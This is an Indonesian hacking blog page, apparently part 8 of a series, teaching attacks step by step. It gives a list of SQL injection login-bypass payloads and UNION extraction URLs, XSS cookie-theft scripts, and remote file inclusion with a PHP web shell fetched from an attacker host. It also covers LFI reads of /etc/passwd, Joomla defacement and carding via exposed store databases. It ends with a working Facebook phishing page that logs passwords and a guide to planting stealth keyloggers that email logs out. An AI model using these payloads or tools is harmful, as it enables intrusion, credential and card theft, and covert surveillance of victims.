SOFTWARE-HACKER-JAGO-PART-8.html
KUMPULAN SOFTWARE HACKER
ANDA JAGONYA
BAG 1 PART 8
Dikumpulkan oleh KAMDANI.BA(Belum Apa apa)
178.
SENI MENEBAK PASSWORD
Password umum :
Password yg mudah dibaca karena memakai kata kata yg umum.
Contoh : rahasia1, password1. 123456 dsb.
Password Menggunakan nama :
Ada nama depan, nama tengah dan nama belakang. Nama anak, binatang, bunga dsb
Password Tanggal lahir :
Akik1274, Bungadesember dsb.
Password Rumah, kantor, sekolah dsb.
Hasanudin32, sma6, dsb
Password nama hewan :
Kucing, brony dsb.
Password ABG (kata kata gaul)
Begichu,
Password tokoh faforit :
Nama tokoh cartun dsb
Password Nama Penting :
4 digit nomor HP dsb.
179.
DEFAULT PASSWORD
Default
password adalah bawaan mesin dari sononya. Dan belum diubah. Biasanya
menggunakan kata
“user” atau “admin”
Software untuk menemukan password default :
http://www.vulnerabilityassesment.co.uk/passwords.htm
http://www.defaultpassword.com/
http://www.routerpasswords.com/
http://www.virus.org/default-password
http://www.corrupteddatarecovery.com/pages/Default-Passwords-Data-Recovery.asp
http://www.defaultpassword.us/
180.
HASH
Password
untuk User dalam database server disimpan dalam bentuk HASH atau MD5
hash (Message-Digest
algorithm 5) yaitu fungsi hash kriptografik
128-bit. Pada standar internet (RFC 1321) MD5 dipakai untuk aplikasi
keamanan dan untuk menguji integritas sebuah file. Sebelumnya MD4
mulai tidak aman. MD% untuk
menggantikan MD4
Yg mengklaim bisa membongkar password MD5 ialah :
http://www.securitystats.com/tools/hashcrack.php
http://www.cmd5.com/english.aspx
http://rainbowtables.net/services/results.php
Contoh :
Password database SQL 202cb962ac59075b964b07152d234b70
Buka http://www.passcracking.com/ > Masukkan password diatas >
Klick DolT
Hasilnya adalah 123
181.
SQL INJECTION
Software : Havij
Untuk dapat menggunakan SQL Injection diperlukan menguasaan Pemrograman SQL dan PHP.
Pemrograman
Web memakai SQL (Structured Query Language) dan PHP. Penggunaan SQL
sebagai
database diantaranya :
Software : MySQL, Micosoft SQL Server, PostgreSQL.
SQL Injection ialah aksi hacking memakai perintah dg syntax SQL.
BLIND SQL bertujuan melihat isi database
ADVANCED
SQL bertujuan melihat isi database, dan mengakses server termasuk
mengakses shell dan
memasang backdoor
Dg
SQL Injection seseorang bisa masuk sebagai Administrator tanpa harus
melakukan scan port yg terbuka,
tanpa terdeteksi oleh firewall dan
tanpa menggunakan tool / program sama sekali.
Seorang
Administrator membuat halaman web untuk aktivitas update semua
halaman web agar selalu siap
dipakai dan tersimpan di
www.nama-website.com/administrator.php.
Dg nama yg sejenis. Misal admin.php.
Diberi pengaman dg Username dan
Pasword.
Dg SQL Injection pengaman ini bisa dilewati sehingga Login Administration bisa ditembus.
SQL Statement ini dipakai pada SQL Injection :
Untuk melihat use yg login :
Select * from admin where username = input_username and password = input_password
Apbila
penulis sebagai administrator dg username = administrator dan
password = admin. Untuk login
statementnya :
Select * from admin where username = ‘administrator’ and Password = ‘admin’
Apabila username dan password tidak sesuai tampil pesan kesalahan
Tidak
adanya karakter tanda petik satu (‘) dan karakter double minus (--)
menyebabkan aplikasi dapat
disusupi SQL Injection.
Untuk membalikkan false menjadi true, statemennya dg input ‘or”=’
Select * from admin where username = ‘’ or’=’’ and Password = ‘’or’’=’’
Apabila kita tahu username tetapi tidak tahu passwordnya maka:
Pada text box username diisi usernamenya dan pada text box password diisi ‘or’’=’ Statement berubah menjadi :
Select * from admin where username = ‘administrator’--‘’ and password = ‘’or’’=’’
Tanda ‘—‘ (double minus) berarti dibelakang tanda tidak dieksekusi
Anda dapat login tanpa perlu tahu username dan password
Alamat Website yg dapat dicoba dg SQL Injection :
“/admin.asp’
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.ap”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
Extensi .asp dapat diganti dg PHP
Apabila
Anda mencoba pada target tetapi tidak terjadi perubahan apa apa,
berarti Target tidak mengizinkan
user menginput selain karakter a –
z, A – Z, 0 – 9 untuk pengamanan.
Variasi kode lain dari SQL Injection :
Username : admin
Password : ‘or’a’=’a
Atau bisa dimasukkan kedua duanya :
admin’— (double minus)
‘or 0=0—
“or 0=0—
or 0=0—
‘or 0=0#
“or 0=0#
or 0=0#
‘or’x’=’x
“or”x”=”x
‘)or(‘x’=’x
‘or 1=1—
“or 1=1—
or 1=1—
‘or a=a—
“or”a”=”a
‘)or(‘a’=’a
“)or(“a”=”a
hi”or”a”=”a
hi”or 1=1—
hi’or 1=1—
hi’or’a’=’a
hi’)or(‘a’=’a
hi”)or(”a”=”a
182.
TEST PENETRASI
Untuk mencari error atau bug SQL. Caranya :
Pada
URL ditambahkan tanda petik tunggal (‘), tanda minus (-), tanda tak
terhingga (~) atau mengganti
angka dibelakang id dg hi’or 1=1—
Pemakaian tanda kutip dan tanda minus ditempatkan dibelakang id
Text dibelakang index.php? atau admin.asp? adau apapun.php? tidak hanya id. Bisa saja yg lain. Sesuaikan.
MENCARI JUMLAH KOLOM
Untuk mengetahui pada kolom berapa bisa dilakukan Injection.
Perintahnya : order by 1-- atau order by 1,2— atau order 1,2,3--, dst.
Bila tidak ada perubahan berarti belum ditemukan halaman injeksi.
Pada order by 1,2,3,4,5,6,7,8-- Enter. Baru ditemukan error. Berarti kolomnya hanya 7. Tidak ada kolom 8
Hilangkan karakter pengujian sebelum memasukkan
Syntax order by Enter
Kalau muncul %20 karakter tsb pengganti spasi pada Chrome dan Internet aexplorer. Tidak pada Firefox
MEMERIKSA FUNGSI UNION
Untuk mencari kolom yg bisa diinjeksi.
Syntax nya : union all select Ganti order by dg union all select
Karena kita tahu kolomnya 7, syntax nya union all select 1,2,3,4,5,6,7
Kalau kurang atau lebih dai 7, tampil error
Ubah nilai id (221 menjadi -221) Disebut mengganti id dg null
Apabila tampil angka berarti UNION telah bekerja.
MEMERIKSA versi MySQL
Angka yg muncul tsb. diatas ganti dg @@version
Misak angka yg muncul 3. Kita ganti dg @@version.
Dapat diketahui bahwa versi MySQL yg dipakai 5.1.41
@@version dapat diganti dg unhex(hex(@@version)) ditulis :
1,2, unhex(hex(@@version))4,5,6,7—
183.
MENCARI NAMA USERNAME DAN DATABASE
Untuk mencari nama database Ganti angka diatas dg database()
Untuk mencari nama pemakai Ganti angka diatas dg user()
http://website-target.com/index.php?id=-221%20union%20all%20select%201,user(),database(),4,5,6,7--
184.
MENCARI NAMA TABEL
Syntax group_concat(table_name) pada angkanya. Tambahkan string pada bagian akhir.
Command from information_schema.tables+where+table schema=database()—
Versi lengkapnya :
Index.php?id=-221%20union%20all%20select%201,2,goup_concat(table_name),4,5,6,7%20command%from%20information_schema.
tables+where+table_schema=database()—
Ditemukan table_admin dan table_user. Untung tidak table credit card
185.
MENCARI NAMA KOLOM DARI TABLE table_user
Dari perintah diatas, kita cukup mengganti pada group_concat(table_name) dengan group_concat(column_name)
Dibagian
akhir tambahkan : command from
information_
schema.column+where+table_name=’table_user’limit 0,1—
Index.php?id=221%20union%20all%20all%20select%201,2,group_concat(column_name),4,5,6,7%20from%20information_
schema,columns+where_table_name=’table_user’%20limit%200,1—
Diperoleh kolom user_id dan password_id
Untuk
mencari kolom lainnya tinggal mengganti nama table. Misal
‘table_user’ diganti dg ‘table_admin’ atau
dg kode HEX dan
menambahkan kode 0x didepan kode HEX ,enjadi 0xHEX-KODE
186.
MENCARI DATA
Syntax concat(nama_colomn1,0x3a,nama_colomn2)
Dibagian akhir syntax : command from nama_table—
Masukkan di URL : index.php?id=-221%20union%20all%20select%201,2,concat(user_id,0x3a,password_id),4,5,6,7%20from%20table_user—
Ditemukan password yg dienkripsi dg MD5
Software : Havij
Software
untuk melakukan SQL Injection, melakukan penetrasi, mencari password
MD5, mencari halaman login
187.
XSS INJECTION
Singkatan dari Cross Site Scriptings
Bukan CSS sebab CSS sudah untuk Cascading Style Sheet
XSS
adalah sebuah Bahasa Pemrograman Web untuk mengendalikan beberapa
komponen yg dipakai
untuk memformat halaman web yg dibuat dg bahasa
HTML dan XHTML.
Serangan
dilakukan dg menginjeksi script kedalam website melalui sebuah
browser. Dg memanfaatkan
HTTP GET/HTTP POST.
Sebuah situs buku tamu (Guest book) di inject demikian :
<script language”javascript”>window,alert(‘Funny, I love this site’)</script>
Anda bebas mengganti kata ‘Funny, I love this site’ dengan kata-kata Anda sendiri,
Kalau
keluar alert javascript di browser berarti situs tsb. bisa di XSS dan
bisa di –redirect ke halaman yg lain.
Syntax nya sbb :
<script>location.href=’http://www.web-tujuan.com’;</script>
Untuk
mendapatkan cookies berisi info yg digunakan oleh server untuk proses
authentikasi (Session method)
disisi Server :
<script>alert(document.cookie)</script>
Contoh :
Tambahkan perintah sbb:
<marquee><font
color=”red”size=”7”>Kena
XSS</font></marquee>
Pada URL menjadi :
Muncul text sesuai yg diketikkan berwarna merah bergerak (marquee)
Untuk melihat cookies :
<script>alert(document.cookie)</script> Masuk URL sbb :
http://chordfrenzy.com/b_search.php?skey=<script>alert(document.cookie)</script>
188.
PHP INJECTION
Diperlukan pemahaman Pemrograman PHP.
Salah
satu aksi hacking yg memanfaatkan kesalahan scripting PHP yg
mengizinkan Aplikasi untuk meng-include
dan mengeksekusi suatu
file/page (script) secara local maupun remote.
Untuk melihat isi directory dgn perintah ‘ls –al’
// begin of cmd.txt
<?passthru ($ GET {cmd});?>
// end of cmd.txt
Contoh :
http://www.situs-target.com/index.php?file=apa-saja.html atau
http://www.situs.target.com/main.php?page=halaman-apa-saja.html
Kita bisa mengganti sbb :
http://www.situs_target.com/index.php?file=http://hacker.com/file.txt?cmd={kode-eksekusi}
http://www.target.com/forum.php?mosConfig_absplute_path=
Kita menemukan situs target.
Kita
memerlukan bantuan script PHP yg harus di upload pada sebuah hosting.
Untuk upload ada hosting
gratisan, ada yg berbayar (Pemakaian PHP
sudah include). Untuk mendaftar pemakaian hosting:
Untuk menggunakan hosting gratisan silahkan baca buku phishing.
Untuk memasukkan script inject yg telah ditanam dalam hosting :
http://www.target.com/forum.php?mosConfig_absolute_path=situs-anda.com/cmd.txt&cmd=ls –al
Hasil perintah berbeda tergantung perintahnya :
id Untuk melihat id user kita
pwd Menampilkan directori aktif
beberapa command yg bisa dipakai :
cd namadirectory = Melihat suatu directory
ls –al = Melihat suatu directory lebih dalam
fined = Mengecek directory
cat = Membaca suatu berkas
wget = Meng upload suatu file
tar –zxvf = Meng extract suatu files yg berbentuk tgz
pwd = Mengetahui di direktori mana kita berada
uname –a = Keberadaan path berada
w = Melihat siapa saja yg telah memakai shell
Ada banyak script PHP yg bisa digunakan.
189.
LFI dan RFI
Local
File Inclusion (LFI) adalah sebuah lubang pada sebuah Website yg
memungkinkan seseorang bisa
meng akses semua file dalam server
melalui URL.
Remote
File Inclusion (RFI) adalah sebuah lubang dimana sebuah situs
mengizinkan seseorang
meng-include-kan file dari luar server.
Penyebabnya dalam sebuah script ada fungsi sbb :
include ();
include_once ();
require ();
require_once ();
Syarat untuk aksi LFI dan RFI adalah pada konfigurasi di server :
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
Contoh : bila pada sebuah file index.php pada isi kodenya sbb :
Include “../$_GET{textfile}”;
?>
Misal : $textfile=text.php
Pada URL :
http://www.situs-target.com/index.php?text=text.php
Seseorang
bisa melakukan LFI karena variable text file di include tanpa filter.
Misal untuk mengakses file
password pada server sbb :
../../../../../../../../../etc/passwd
(jumlah ../ tergantung kedalaman folder tempat file index.php
berada) Isi file
password ditampilkan atau error
Atau Warning.
Untuk dapat mengelabui script tsb, gunakan %00
Dg syarat : magic_quotes_gpc=off. Kode %00 disebut null injection
Berfungsi untuk menghilangkan karakter apapun setelah passwd.
http://www.situs-target.com/index.php?textfile=../../../../../../../../../etc/passwd%00
Setelah
ditemukan bug LFI, coba cari bug RFI dg menambahkan link file remote
(dari luar website) pada
variable textfile.
http://www.situs-target.com/index.php?textfile=http://www.situs-anda.com/script.txt
script.txt bisa Anda ganti missal : “hacked by nama-anda”
Jika
pada browser tampil kalimat tsb. berarti situs tsb. bisa atau boleh
dibilang memiliki bug, sehingga
dilakukan aksi RFI
UJICOBA
Index.php/page.php= dan target didapat
http://www.situs-target.com/index.php?page=roms
tampil halaman
hapus text apapun dibelakang page menjadi /index,php?page=
http://www.situs-target.com/index.php?page=../
Bila muncul pesan error/warning berarti situs bisa di lakukan LFI
Coba meng akses file /etc/passwd > ../ diganti dg ../etc/passwd
http://www.situs-target.com/index.php/?page=../etc/passwd
Pada pesan error/warning tampak file passwd memakai ekstensi txt
Jadi kita akan menggunakan null sessions
http://www.situs-target.com/index.php?page=../etc/passwd%00
Bila
masih muncul pesan error/warning berarti kita perlu menambah beberapa
directory (../../) sampai
pesan error hilang.
http://www.situs-target.com/index.php?page=../,,/../etc/passwd%00
Ditemukan file passwd. Contoh isi file tsb:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin/bin/bash dst,
Periksa apakah proc/selfenviron dapat diakses.
Tidak semua target bisa dieksploitasi proc/self/environ-nya
Caranya : Ganti perintah etc/passwd menjadi proc/self/environ%00
http://www.situs-target.com/index.php?page=../,,/../proc/self/environ%00
Apabila dapat di eksploitasi maka tampilan sedikit berbeda.
190.
DEFACE
Diperlukan pemahaman pemrograman Joomla.
Hacking yg mengubah tampilan sebuah website. Dapat menggunakan bermacam cara.
Pada situs yg menggunakan Joomla, Gunakan :
http://www.situs-target.com/index.php?option=com_user&task=register
Ganti parameter menjadi :
http://www.situs-target.com/index.php?option=com_user&view= &layout=confirm
Tampil permintaan TOKEN
Masukkan tanda petik tunggal (‘) > Klick Submit > Token jadi error
Apabila bug nya belum di path, muncul form meminta password baru
Anda bisa mengganti username dan Password. Anda bisa Login.
Tampil pesan proses reset telah berhasil dilakukan.
Anda bisa mencoba login di halaman administrator
http://www.situs-target.com/administrator/
Dari halaman Admin Anda bisa mengganti halaman index atau membuat file HTML baru sebagai aksi deface.
AWAS : Kalau Anda men deface website orang lain, jangan sekali kali mengganti halaman index.
191.
CARDING
Kegiatan pencurian nomor credit. Banyak cara dapat ditempuh.
Cara SQL Injection, Cara Comersus, Cara CVV
Pada
proses pembelian pada website online shopping, data kartu kredit
disimpan didalam file order.log.
Kegiatan carding berusaha membuka
file tsb.
Biasanya hasil tampilan dilayar belum rapi sehingga sulit dibaca. Cara merapikan dg copy paste pada MS Word.
192.
COMERSUS
Aplikasi
penjualan online yg menggunakan Bahasa ASP, disertakan file data
default yg bernama Comersus.mdb.
Aplikasi ini dipakai karena tidak
perlu belajar bahasa perograman lagi. Siap pakai.
File database Comersus.mdb dapat di download dan dapat dilihat.
Dari Google > Inurl:comersus_dynamicindex.asp Tampil target
Website target ternyata bernama :
http://www.situs-target.net/store/comersus_dynamicindex.asp
Ubah URL menjadi :
http://www.situs-target.net/store/comersus.mdb
tidak ditemukan apapun.
Saya ganti menjadi :
http://www.situs-target.net/store/database/comersus.mdb
Tetap nihil.
Saya ganti menjadi :
http://www.situs-target.net/comersus.mdb
Masih tetap membisu
http://www.situs-target.net/database/comersus.mdb
Sekarang Websitenya sudah mau tebuka. Dan siap di download.
193.
CVV
Tiga
angka rahasia pada kartu credit bernama CVV (Cardholder Verification
Value). Pada kartu Visa dan
Diners Club disebut CVV2, MasterCard
menyebut CVC2. Ada yg menyebut CSC (Card Security Code), CVN
(Card
Verivication Number).
Otorisasi
(pengechekan) bahwa anda pemilik kartu credit tsb, dg menunjukkan
KTP, tanda tangan atau dg
PIN. Untuk berbelanja di internet
diperlukan CVV. Pada Amex (American Express) disebut CID (Card
Identification
Number) 4 digits dibagian depan karu.
Kartu
credit tidak berlaku jika tidak ada tanda tangannya dibagian
belakang. CVV berguna sebagai pengganti
tandatangan otorisasi.
194.
PHISING
Cara mudah menyadap password dan cara mencegahnya.
Usaha
membuat orang mengunjungi situs menarik yg salah sehingga orang tsb
memasukkan username
dan password.
Atau
membuat situs yg namanya mirip dg nama situs asli. Misal situs asli
bernama www.klikbca.com. Lalu
membuat situs lain yg isinya sama dg penampilan situs asli, tetapi
nama situsnya diubah sedikit. Misal klick-bca.com,
kilkbca.com,
clikbca.com, klickbca.com klikbac.com
Contoh :
Buka http://facebook.com/login.php
Dari Menu yg muncul klik kanan > view page source
Copy Paste script tsb pada NotePad
Cari kode “action” tanpa tanda kutip untuk dimodifikasi.
Pada Find what : Tulis > action > Enter
Pada action=http://login.facebook.com/login.php > ubah action jadi :
action=”secret.php” > ubah juga dari “POST” menjadi “GET“
Simpan file tsb dg nama index.php
Supaya file .txt menjadi file .php, dalam kotak dialog Save As >
Pilih All Files
Dalam Notepad buat file.php dan disimpan dg nama secret.php
Isi file secret.php sbb :
<?php
Header (“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pass.txt”, “a”);
foreach ($_GET as $variable =>$value) ’[
fwrite ($handle, $variable);
fwrite ($handle, “=”);
fwrite ($handle, $value);
fwrite ($handle, “\r\n”);
)
fwrite ($handle, “\r\n”);
fclose ($handle);
exit;
?>
Buka Notepad lagi dan biarkan isinya kosong. Save dg nama pass.txt
UPLOAD
Ketiga
file tsb index.php, secret.php dan pass.txt kedalam website hosting
Anda. Kini sudah memiliki sebuah
halaman Phising Facebook
Sebarkan
link supaya orang bersedis membuka link/URL yg berisi halaman
Facebook palsu tsb. Tampaknya
seperti halaman facebook asli padahal
palsu.
Waktu seseorang memasukkan password, password tesimpan dalam file pass.txt
195.
KEYLOGGER
(Yg tidak terdeteksi oleh Anti Virus).
Software untuk memata matai aktivitas komputer
Keylgger
singkatan dari Keystore Logger. Yg berbentuk physic sebesar batu
batere AA dipasang antara
Keyboard dg computer.
Yg
berbentuk software dapat bekerja secara tersembunyi untuk merekam
kegiatan keyboard dan meng
capture gambar dan mengirim laporannya ke
internet email secara diam diam.
Software software untuk Keylogger :
007 Keylogger Spy Software 3.873 LastBit Absolute Key Logger 2.5.283
Active Key Logger 2.4 Metakodix Stealth Keylooger 1.1.0
Activity Keylogger 1.80.21 Network Event Viewer v6.0.0.42
Activity Logger 3.7.2132 OverSpy v2.5
ActMon Computer Monitoring 5.20 PC Activity Monitor Professional 7.6.3
Actual Spy 2.8 PC Spy Keylogger 2.3 build 0313
Advanced Invisible Keylogger v1.9 PC Weasel 2.5
Advanced Keylogger1.8 Personal PC Spy v1.9.5
Ardamax Keylogger 2.9 Power Spy 6.10
BlazingTools Perfect Keylogger 1.68 Powered Keylogger v2.2.1.1920
BlazingTools Remote Logger v2.3 Quick Keylogger 2.1
Data Doctor Keylogger Advanced v3.0.1.5 Radar 3.0
Local Keylogger Pro 3.1 Real Spy Monitor 2.80
ExploreAnywhere Keylogger Pro 1.7.8 Shadow Keylogger
Family Cyber Alert 4.06 Remote Desktop Spy 4.04
Family Keylogger 2.80 Remote Keylogger 1.0.1
Firewall bypass Keylogger 1.5 Revealer Keylogger Free 1.33
Free Keylogger 2.53 SC Keylogger Pro 3.2
Ghost Keylogger 3.80 Smart Keystroke Recorder Pro
Golden Eye 4.5 Spector Pro 6.0.1201
Golden Keylogger 1.32 SpyAnytime PC Spy 2.42
Handy Keylogger 1.32 SpyBuddy 3.7.5
Home Keylogger 1.77 Spytech SpyAgent 6.02.07
Inside Keylogger4.1 Spytector 1.3.5
iOpus Starr PC and internet Monitor 3.23 Stealth Key Logger 4.5
iSpyNow v2.0 System keylogger 2.0.0
KeyScrambler 1.3.2 Tim’s Keylogger 1.0
Keystroke Spy 1.10 Tiny Keylogger 2.0
KGB Keylogger 4.2 Total Spy 2.7
KGB Spy 3.84 Windows Keylogger 5.04
Romaco Keylogger
UJICOBA
Software : Shadow Keylogger memakai flashdisk tanpa instalasi
Tancapkan flashdisk pada komputer target. Bisa diperoleh Username dan password.
Software : Romaco Keylogger Bisa berjalan pada Windows 8
Jalankan program > Tampil halaman kosong
Klick Start > Klick Hide untuk menyembunyikan program.
Tekan tombol PAUSE di Keyboard berturut turut. Program berjalan.
Tampil nama account dan passwordnya.
Text yg muncul agak kacau karena program belum mengenal karakter khusus.
Ini Program Keylogger lainnya. Silahkan coba :
C:Users\Public\Documents\log.txt (Untuk Windows Vista dan 7).
C:Users\Public\Public Documents\log.txt (Untuk Windows 8).
C:Documents and Settings\All Users\Documents\log.txt (Windows XP).
Software : Quick Keylogger
Hasil log disimpan pada file menurut pilihan Anda.
Program
ini mencatat tombola pa saja yg Anda tekan. Termasuk rekaman akses
Facebook, browser Firefox,
username, password apakah menulis
menggunakan MS Word dsb.
Software : Spytector Tidak perlu menginstall. Cukup menyetujui.
Ada banyak kemampuan. Tetapi kita hanya perlu Keyloggernya saja.
Sebaiknya Anda masukkan password agar tidak dibuka orang lain.
Pada Bag. Local Options chentang Spytector > masukkan password.
Mulai meng konfigurasi file server untuk dimasukkan computer target
Pada
Tab BASIC SETTINGS buat file server. Server name dan logfile name
saya beri nama “local” supaya
tidak dicurigai.
Pada Bag, Application for log delivery saya pilih Browser & Emailer
Supaya hasil rekaman dikirim melalui Email.
Pada tab Icon Changing, icon diganti dg icon lain.
Masukkan Email tujuan dan Email pengirim > Chentang > Enable Email
Kick tombol SMTP untuk memastikan protocol pengiriman bekarja.
Secara default SMTP Address adalah SMTP Hotmail.
Untuk menggunakan Email lainnya seperti Gmail > klick Get SMTP
Bila alamat SMTP ditemukan, tampil pesan :
The SMTP address have been found > OK
SMTP Address telah terisi. > Lakukan test.
Klick tombol Test > Muncul pesan : The email is working > OK
Pada Bag. FTP Setting lakukan pengaturan :
Masukkan data FTP seperti username, password, dan alamat FTP nya.
FTP ini diperoleh dari hosting Anda > Chentang Bag. Enable FTP.
Lakuan test pada koneksi FTP > Klick test
Lakukan
pengaturan Server. Supaya tidak ketahuan kalau computer telah
disusupi Keylogger. Chentang
pada Bag. Mail Server. Dg demikian file
server terhapus setelah terpasang pada computer target.
Non Aktipkan System Restore
Pada versi full version, bisa diatur tampian pesan pada computer target > Klick Configure
Pada Bag. Message Title isi dg judul kotak dialog. Tombol apapun yg ditekan target, file server tetap terpasang.
Pada
Bag. Log Settings Anda bisa memilih kapan file log akan dikirim
Setiap mencapai jumlah bit tertentu
(min. 1024, max. 9999999 byte)
atau setiap berapa hari. > Klick tombol Build Server
Dimana file server disimpan ? Kirimkan file s4rver ke computer target
Komputer
target menerima kiriman file server. Waktu di klick langsung
berjalan. Pada directory nya ada
file local.exe dan local. Huf
Pada computer kita untuk melihat hasil rekaman > Klick Log Viewer
Klik LANJUTKAN
http://www.hackerkamdani.blogspot.com/KUMPULAN-SOFTWARE-KAMDANI.html
Efvy
Zam :
BUKU SAKTI HACKER Mediakita 2014
Yudha
Yogasara
:GOOGLE DORKS Penerbit Neomedia
Press Semarang
WAHANA KOMPUTER : Koleksi Software Gratis
untuk Hacking & Cracking Penerbit
ANDI Semarang
Dedik
Kurniawan & Java Creativity BUKU SAKTI TEKNIK
HACKING Penerbit PT ELEX MEDIA KOMPUTINDO
Rudy
Samuel Pardosi KALI LINUX TOP HACKING Jasakom
Efvy
Zam Kerinci GOOGLE HACKING Penerbit Neomedia Press Semarang
Efvy
Zamidra Zam WIRELESS HACKING
Edisi Revisi
Penerbit
PT ELEX MEDIA KOMPUTINDO
Zuhardi
Eko Rahman HACK RAPIDSHARE
& ATTACK Friendster
Penerbit
Neomedia Press Semarang
Jordan Andrean cs HACKING STREAMING
Penerbit
PT ELEX MEDIA KOMPUTINDO
Dedik
Kurniawan & Java Creativity HACKING dengan KEYLOGGER Penerbit PT Elex Media Komputindo Jakarta
Muhammad
Syukri Yudha Yogasara : TEKNIK HACKING UNTUK PEMULA
Penerbit
PT Elex Media Komputindo Jakarta
MundzirMF
: TIP & TRIK BELAJAR HACKER
Penerbit
NOTEBOOK Yogyakarta 55187
Efvy
Zamidra Zam : Trik Hacking Menggunakan Flash Disk
PT Elex
Media Komputindo Jakarta
Komentar
Posting Komentar